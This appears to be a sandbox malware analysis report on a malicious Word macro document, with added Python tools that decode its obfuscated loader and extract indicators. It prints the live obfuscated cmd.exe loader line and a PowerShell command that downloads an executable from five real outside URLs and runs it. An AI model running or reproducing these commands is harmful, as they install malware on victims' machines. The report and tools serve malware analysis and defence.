Analysis Overview
SHA256
3cd982a08fa42bd51573f73b5eb53336e9fef97964b4eb9491153125266e9919
Threat Level: Known bad
The file 7f17eb24b25d4c3e5012c7c5e38786ee_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Blocklisted process makes network request
Office macro that triggers on suspicious action
Suspicious Office macro
An obfuscated cmd.exe command-line is typically used to evade detection.
Drops file in Windows directory
Office loads VBA resources, possible macro or embedded object present
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Checks processor information in registry
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-29 01:33
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-29 01:33
Reported
2024-05-29 01:35
Platform
win10v2004-20240508-en
Max time kernel
137s
Max time network
135s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3492 wrote to memory of 4748 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\SYSTEM32\cmd.exe |
| PID 3492 wrote to memory of 4748 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\SYSTEM32\cmd.exe |
| PID 4748 wrote to memory of 1216 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4748 wrote to memory of 1216 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7f17eb24b25d4c3e5012c7c5e38786ee_JaffaCakes118.doc" /o ""
C:\Windows\SYSTEM32\cmd.exe
cmd /V/C"^s^e^t ^f^i=^Y^95^ ^s^:^&^ ^S^dc^ V^6v^ ^x^Q(^ ^2^>^`^ r^F^] ^w^f^Q^ g^t^Z^ ^h^Z^Y^ ^A^K^u^ ^{(^F^ ^x^*^7^ N^,^q^ ^j#^G^ ^j^Zr^ ^H^.^ ^Xk^p^}^$^\R^}^;^g^u^{^-q^{h^i^+^yc^A^7^?^t^T^K^2^a^B^O)c^[^l^X^}^A^5n^;^QN^A^k^\^`^Z^a^>(^K^e^#^0/rDr^K^b^6^?^>^;^+^A^Jc^:^H^Bz)^*%^q^*^O^?^$)^a^~^ E^sy^m^*^&^b^e^T^As^t^6^d^K^I^&^K^H^-^&^Q^e^e^t^}^h^k^T^y^b^o^acvv^[R^`n^m^+^d^I^B^D7^;^U^{^7)^j^*^>c^=^0^_^z^Y^3%^q%^l^}^$^P^D^I^ ^,^L^@^,c^'^D^j^+C^f^dA(^7^f^X^F^|$^k^]E(^f^BR^e^Qn^H^l^w^0^K^i^8^*^I^F^7^ ^`^d^>^i^6^a^M^F^P^o^T^k^q^lk^7^Sn^h^]^L^w^EV^X^o^&^=^m^D^}^K^g^.^:l^|n^E^a^eb^.^J^>E^D^P^e^$^J^?v^{^gF^e^yn^`^Or^A^W^*^tx^G^g^{^G^o^<)^&N^7^G^ ^9^D^K^3^b^p^t^6^3^s^$^k^@^, ^\^Q^4n^?^]^T^iN^W^2^ ^k^Q^&j^F^W^a^d^q^L^w^fC^7^_^$}^_^G(,^k^5^h^ADEc^5/^ ^a^ZV^>^e^m^[^<r^-^d^{^o^~^?^W^f^s^`(^;P^OF'%^27^e^s^\^P^x^4^+^1e^6^}x^.^p^6^\^'^?^}^u^+^p^F^l^M^Xng^K^\^Z^E^I'^=^Q$^b^D^h^+^qV^~^'^A^7^ ^\r^9^p^'^+2v^+^GV^acZ^.^W^i^s^8^]^l^X^{^:b^A^k^,^uC^[^_^p^h^.^I^:^81^Ov^w^4^3n^p^j^z^es^~^I^$^PcV^=^W^B^jcn%^W^z(^w,^q^w^Y^9^$^ur^{^;^ZIp'^O^_c^4^q^g^J3^+^:^m^1^>^5^{^'X^H^Q^ ^q^X^B^=^S^]^f^ ^KV^u^Mr^8^x^K^j^0^Q^I^4^{^1$^=^|(^;^m^8r)^]^TW^'^A^y^w^@^q^h^0^'^q^8)(F^i^p^t^HC^z^i^*^@m^l^z/^}^p^0^*^dS^_^s^~^.^<^>^*^'^|^D^:^q^KC^=^Fv^#}^M^P^K^FH^P^\^@^oh^6^w^a^+^=^q^d^X^pc^w^5^s)^8^ ^u^S/^\^9^0^m^5nC^o^w%^gcVM^+^.^O^>^t^t^m^F1^eu^]^j^i^z^6^yv,^P)n^Z^M^x^aSJ^m^s^l^t^x^m^br^q^a^Iz^M^l^o^'(/^Zl^q/K^MW^:,^0^_^p^?^Z^ut^Z^D^Bt^g^o^{^h^~^|^8^@r^$^>^O^k^f^jI^w^L^F^4^H^Q^bCn^h^Q^3^m^'^PN^k^8^Z^K_^D^d/^z^H^I^oN^i^T^f^t^H^mnc^q^\^i^}^ g^.^AE^#h^X^y^pk^a^i^E^i^\^D^I^e^l^#^<^h^]^e^T^sU^Q^J^h^.^L^8^a^-^@^]^l^?/vl^=^P^,^ur^;^T^d^}^d^T^b^G5^b^aVv*/^=^E^./^d^]^ 
^:2^W^M^p^]^s^J^t^_^'^b^t^.^s^p^h^,%^0^@^?n^>^J^s^;^g^b^3^F^4^p^z^w/v^#^;^1J^{^\^8^x^,CV^l^T-^=^d^X^]^d^w^\^K^H/^q^[^5^e^i^}^,^d^&^m^@^.^~n^>^d^z^.Nn^X%^ha^>aC^t^h^}:^s^KV^u^o^W^&^lt/^:r^o^{v^-^h^|^@^7^p^u^>^E^.^B(^T^w^Y^b^P^w^]5I^w^1^Pn/^`^Z^8/^{^X^i^:r^e^f^p^F^]^#^tn7N^t^P^pC^h^sk^x@^Z^=^6^I^Q^b^O^3^l^q^*N^O^8^\^K^4?^0^a^l^3^.^6^A^5/^x^\^o^5^7^+^X^h^h^.^B^*/^d4^<o^t^O^;r^])^F^.H^P^ie^I^s^:^u^x^H^E^q^|^K^A^i^Y/^E^f^[^>V^i^J^F^on^O^{^Y^i^2^9^S^a^M^u^`r^?^8^p^t^w^?^q^.{^P^A^wd^#r^w^u^}^$^w^W^s^o/^m^`^u/^e^1^{^:^L^pr^p^&^FY^t^Y^@^k^t^D^0^?h^9^]8^@@^5^sv^;^5^E^d^Y^U^|^P^WN^2^U^q^h^4^uC^=^?^O^`^wN^p^\^I^.^3h^A^G^1^K^S^H/^L^F^'^e^#^[^*^iR(^|^pR^Jr^t ^M^U^o^*^,^f^s^*^i^&/^>^a^-r^+%^Y^u^2^1^Qvv^x^2n^.6r^i^I^k^b^o^2^'^t^yc^U^4^t^2^m^J/^*^x^[^m^#^7^ ^o^*N^tc^s^}^m^.^I^EN^a^9^O^M^y^&N^tn^B^-^6^e^O^D^e^k^{^-C^s^.^M^p^d%bcn^Z^?^L^u^M^`^2^f^[^_^ar^J^?^}^i^|^qc^a^5^H^]^f^ R^B^.P^\a^w^D^GI^w^U%^u^w^{^_^}/^{^h^S/V^>^:^:^0^9^h^p^*^I^7^t+^G^~^t^y(^]^h^T^>^*^'^KV^9^=f^z{G^a^9^1^K^7^z*^ty^_^f^$i^A)^;^{^:^h^t~^\^`n^yv^Q^e^ ^j^d^i^Pc^?^lT^U^hC^F^A^4^b^K^@^\^e^Z^g^A^WcC^Q^.(^+^L^t^{^DW^e^[^5^mN)^g^f^ ^4i^Qt^[^\^*c^8^h^:^e^p^sV^j^}c^A^b^.^6ro^[^,^a^-~^h^]^wf^P^~^e^]^K^wnzR^Z=^X^}nn^l^3^s^b^wC^=^E^o^O^@^$^g^{^*^ ^j^b^wlC^|^4^l^,^z^A^e^1^_Qh^6^;^d^s^+)^hr{I^e^e^Xx^b^wN^]^xo^o^+^q^p&&^f^or /^L %^h ^in (^1^6^1^5^,^-^4^,^3)^d^o ^s^e^t ^F^0^Y^g=!^F^0^Y^g!!^f^i:~%^h,1!&&^i^f %^h=^=^3 c^a^l^l %^F^0^Y^g:^~^6%"###
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $Ebn=new-object Net.WebClient;$tKG='http://www.fairfundskenya.com/tyoinvur/sotpie/13pOuUPdv@http://www.trainifique.ro/h7x6aKN3I@http://www.photostand.de/wdlxJvpbJ@http://abdullahsheikh.info/KN3C4IO@http://lamsanviet.com/8wdaoHMFq'.Split('@');$IKM = '134';$qzc=$env:public+'\'+$IKM+'.exe';foreach($fdj in $tKG){try{$Ebn.DownloadFile($fdj, $qzc);Invoke-Item $qzc;break;}catch{}} ###
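The cmd.exe line above is the loader's first stage and the PowerShell line is what it reconstructs. Reading the visible command: `set fi=...` stores a long junk string (caret-escaped so that `&`, `>` and friends are not interpreted), `for /L %h in (1615,-4,3)` walks that string backwards picking every fourth character, each pick is appended to `F0Yg` via delayed expansion, and on the last index `call %F0Yg:~6%` forces a second round of percent expansion so the freshly built variable is executed. The `:~6` is there because cmd.exe in command-line mode leaves an undefined `!F0Yg!` in place on the first iteration, and `!F0Yg!` is exactly six characters long. The following Python is an added example written for this page (not part of the sandbox report): a small interpreter for just those cmd.exe constructs (`set`, `for /L`, `if`, `call`, caret escapes, `%VAR:~start,len%` / `!VAR:~start,len!` substrings). `SAMPLE` is a constructed line in the same style, not the report's real command line; the model assumes, as is true on a default VM, that none of the `%...%` pairs inside the junk name an existing environment variable, so they stay literal just as cmd.exe preserves them.

```python
import re

# Constructed sample in the same style as this report's cmd.exe line (it is NOT
# the real command line): every 4th character of a junk-filled buffer, read
# backwards, spells the payload; nearly every character is caret-escaped; the
# junk includes an escaped '&'; and ':~6' strips the literal '!F0Yg!' that the
# first loop iteration leaves behind because cmd.exe preserves undefined
# variables in command-line mode.
SAMPLE = ('cmd /V/C"^s^e^t ^f^i=xx^&i^x^x^xh^x^x^x^ ^x^x^xo^xxxh^x^x^xc^xx^xe'
          '&&^f^o^r /^L %^h ^in (2^7,^-^4,^3)^d^o ^s^e^t ^F^0^Y^g=!^F^0^Y^g!!^f^i:~%^h,1!'
          '&&^i^f %^h=^=^3 c^a^l^l %^F^0^Y^g:^~^6%"###')

WRAP_RE = re.compile(r'^\s*cmd(?:\s+/[^\s"]+)*\s*"(.*)"', re.S | re.I)
SET_RE = re.compile(r'^set\s+(\w+)=(.*)$', re.S | re.I)
FOR_RE = re.compile(r'^for\s+/L\s+%(\w)\s+in\s*\(\s*(-?\d+)\s*,\s*(-?\d+)\s*,\s*(-?\d+)\s*\)'
                    r'\s*do\s+(.*)$', re.S | re.I)
IF_RE = re.compile(r'^if\s+(\S+?)==(\S+)\s+(.*)$', re.S | re.I)
CALL_RE = re.compile(r'^call\s+(.*)$', re.S | re.I)
VAR_RE = r'(\w+)(?::~(-?\d+)(?:,(-?\d+))?)?'  # NAME | NAME:~start | NAME:~start,len


def substring(val, start, length=None):
    """%VAR:~start,len% semantics, including negative start and len."""
    n = len(val)
    s = start if start >= 0 else max(n + start, 0)
    if length is None:
        return val[s:]
    return val[s:s + length] if length >= 0 else val[s:n + length]


def expand(text, env, delim):
    """Expand %VAR% (delim='%') or !VAR! (delim='!') references. Undefined
    names are left untouched, which is cmd.exe's command-line-mode behaviour
    and exactly what the loader's ':~6' relies on."""
    def repl(m):
        name, start, length = m.group(1), m.group(2), m.group(3)
        if name not in env:
            return m.group(0)
        return substring(env[name], int(start or 0), None if length is None else int(length))
    d = re.escape(delim)
    return re.sub(d + VAR_RE + d, repl, text)


def split_statements(cmd):
    """Decode caret escapes and split on unescaped '&' / '&&'."""
    stmts, cur, i = [], [], 0
    while i < len(cmd):
        c = cmd[i]
        if c == '^':                      # caret makes the next char literal
            if i + 1 < len(cmd):
                cur.append(cmd[i + 1])
            i += 2
        elif c == '&':                    # unescaped & or && ends the statement
            stmts.append(''.join(cur))
            cur = []
            i += 2 if cmd.startswith('&&', i) else 1
        else:
            cur.append(c)
            i += 1
    stmts.append(''.join(cur))
    return [s for s in stmts if s.strip()]


def run(stmts, env, launched):
    """Model set / for /L / if / call. As in cmd.exe, a for or if owns the rest
    of the line; whatever 'call' would execute is appended to `launched`."""
    for i, s in enumerate(stmts):
        s = s.lstrip()                    # trailing spaces belong to set values
        if m := SET_RE.match(s):
            env[m.group(1)] = expand(m.group(2), env, '!')
        elif m := FOR_RE.match(s):
            var, body = m.group(1), m.group(5)
            start, step, end = int(m.group(2)), int(m.group(3)), int(m.group(4))
            if step == 0:
                return
            rest = [body] + stmts[i + 1:]
            for v in range(start, end + (1 if step > 0 else -1), step):
                run([x.replace('%' + var, str(v)) for x in rest], env, launched)
            return
        elif m := IF_RE.match(s):
            if m.group(1) == m.group(2):
                run([m.group(3)] + stmts[i + 1:], env, launched)
            return
        elif m := CALL_RE.match(s):
            # call re-expands %VAR% in its argument: this is the decoded stage
            launched.append(expand(m.group(1), env, '%'))
        # any other command is irrelevant to reconstructing the payload


def deobfuscate(cmdline):
    """Return the command(s) that 'call' hands back to cmd.exe."""
    m = WRAP_RE.match(cmdline)
    env, launched = {}, []
    run(split_statements(m.group(1) if m else cmdline), env, launched)
    return launched


if __name__ == '__main__':
    print(deobfuscate(SAMPLE))
```

Feed `deobfuscate()` the full cmd.exe line from a process-creation event (Sysmon event 1 or 4688 with command-line auditing) to recover the PowerShell stage without running it; the model deliberately stops at `call`, so it never executes what it decodes. It does not model `|`, parenthesised blocks or batch-file semantics, which this loader does not use.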
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| IE | 52.109.76.243:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.fairfundskenya.com | udp |
| US | 8.8.8.8:53 | www.trainifique.ro | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 185.199.109.153:80 | www.trainifique.ro | tcp |
| US | 8.8.8.8:53 | trainifique.ro | udp |
| US | 185.199.111.153:443 | trainifique.ro | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.photostand.de | udp |
| DE | 81.169.145.165:80 | www.photostand.de | tcp |
| DE | 81.169.145.165:443 | www.photostand.de | tcp |
| US | 8.8.8.8:53 | abdullahsheikh.info | udp |
| US | 8.8.8.8:53 | lamsanviet.com | udp |
| IN | 193.203.163.237:80 | lamsanviet.com | tcp |
| IN | 193.203.163.237:443 | lamsanviet.com | tcp |
| US | 8.8.8.8:53 | 153.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.145.169.81.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.163.203.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| NL | 23.62.61.162:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 162.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 52.111.227.11:443 | | tcp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
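The five hosts that the PowerShell stage (listed under Processes above) tries in turn are the non-Microsoft names in this table: www.fairfundskenya.com, www.trainifique.ro, www.photostand.de, abdullahsheikh.info and lamsanviet.com, each resolved and, where a connection followed, contacted on port 80. The downloader stores the URL list as one `@`-joined string and builds the drop path from `$env:public` plus a separate variable, so a naive URL regex over the command line misses the file name. The Python below is an added example (not part of the report) that resolves that small subset of PowerShell to pull the URLs, hosts and drop path from the decoded stage; `REPORT_PS` is the PowerShell line copied from this report, and `SANDBOX_ENV` is an assumed value for `%PUBLIC%` consistent with the `C:\Users\Public\134.exe` entry in the Files section below.

```python
import re
from urllib.parse import urlsplit

# The PowerShell stage exactly as listed in this report's behavioral2 process list.
REPORT_PS = r"""powershell $Ebn=new-object Net.WebClient;$tKG='http://www.fairfundskenya.com/tyoinvur/sotpie/13pOuUPdv@http://www.trainifique.ro/h7x6aKN3I@http://www.photostand.de/wdlxJvpbJ@http://abdullahsheikh.info/KN3C4IO@http://lamsanviet.com/8wdaoHMFq'.Split('@');$IKM = '134';$qzc=$env:public+'\'+$IKM+'.exe';foreach($fdj in $tKG){try{$Ebn.DownloadFile($fdj, $qzc);Invoke-Item $qzc;break;}catch{}}"""

# Assumed environment of the detonation VM; only %PUBLIC% is needed here and the
# report's Files section confirms the drop landed in C:\Users\Public.
SANDBOX_ENV = {'public': r'C:\Users\Public'}

ASSIGN_RE = re.compile(r"\$(\w+)\s*=(?!=)\s*([^;]+)")          # $name = expr;
SPLIT_RE = re.compile(r"'([^']*)'\.Split\('([^']*)'\)", re.I)   # 'a@b'.Split('@')
TOKEN_RE = re.compile(r"'[^']*'|[^'+]+")                        # literal | term


def evaluate(expr, scope, env):
    """Resolve the subset of PowerShell the downloader uses: single-quoted
    literals, '+' concatenation, $var, $env:VAR and 'a@b'.Split('@').
    Anything else (e.g. new-object ...) is returned verbatim."""
    if m := SPLIT_RE.fullmatch(expr):
        return m.group(1).split(m.group(2))
    parts = []
    for tok in (t.strip() for t in TOKEN_RE.findall(expr)):
        if not tok:
            continue
        if tok.startswith("'"):
            parts.append(tok[1:-1])                 # no escapes in '...' strings
        elif tok.lower().startswith('$env:'):
            parts.append(env.get(tok[5:].lower(), ''))
        elif tok.startswith('$') and isinstance(scope.get(tok[1:]), str):
            parts.append(scope[tok[1:]])
        else:
            return expr
    return ''.join(parts)


def extract_iocs(ps_cmdline, env=SANDBOX_ENV):
    """Walk the assignments in order (later ones may reference earlier ones)
    and report URLs, hosts, local drop paths and the download/execute verbs."""
    scope = {}
    for name, expr in ASSIGN_RE.findall(ps_cmdline):
        scope[name] = evaluate(expr.strip(), scope, env)
    urls = [u for v in scope.values() if isinstance(v, list)
            for u in v if re.match(r'https?://', u, re.I)]
    paths = [v for v in scope.values()
             if isinstance(v, str) and re.match(r'[A-Za-z]:\\', v)]
    return {
        'urls': urls,
        'hosts': [urlsplit(u).hostname for u in urls],
        'drop_paths': paths,
        'downloads': bool(re.search(r'\.DownloadFile\(', ps_cmdline, re.I)),
        'executes': bool(re.search(r'\b(Invoke-Item|Start-Process)\b', ps_cmdline, re.I)),
    }


if __name__ == '__main__':
    for key, value in extract_iocs(REPORT_PS).items():
        print(f'{key}: {value}')
```

Because the loop breaks after the first successful `DownloadFile` and `Invoke-Item`, only one of the five URLs actually served the payload; all five hosts are still worth blocking, since the order is fixed and the others are the fallbacks.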
Files
memory/3492-2-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp
memory/3492-3-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp
memory/3492-4-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp
memory/3492-1-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp
memory/3492-0-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp
memory/3492-5-0x00007FFC162CD000-0x00007FFC162CE000-memory.dmp
memory/3492-6-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-7-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-8-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-9-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-11-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-12-0x00007FFBD3FE0000-0x00007FFBD3FF0000-memory.dmp
memory/3492-10-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-13-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-14-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-15-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-16-0x00007FFBD3FE0000-0x00007FFBD3FF0000-memory.dmp
memory/3492-17-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-36-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-37-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-38-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/1216-42-0x000002BE4DE10000-0x000002BE4DE32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_udcmrd5m.2di.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Public\134.exe
| MD5 | 536033862cf0a0ae7b85c1edd0d9c4a7 |
| SHA1 | 19ca4a149ee98f366541db126cefcd15738cd1eb |
| SHA256 | 9c545472b33561bd18c5dfedbb5c9944a1bd90cb8f4edbdee2a5d75e773b9f36 |
| SHA512 | d53d92c563d4f8aba1578f1e52abdda70aec2506bf18439e653e360c285fc01eacc8fadb85b615b38635d9c8f569bb04960084e75e0f2df749059fe43ea32b44 |
C:\Users\Admin\AppData\Local\Temp\TCD81A1.tmp\sist02.xsl
| MD5 | f883b260a8d67082ea895c14bf56dd56 |
| SHA1 | 7954565c1f243d46ad3b1e2f1baf3281451fc14b |
| SHA256 | ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353 |
| SHA512 | d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e |
memory/3492-536-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
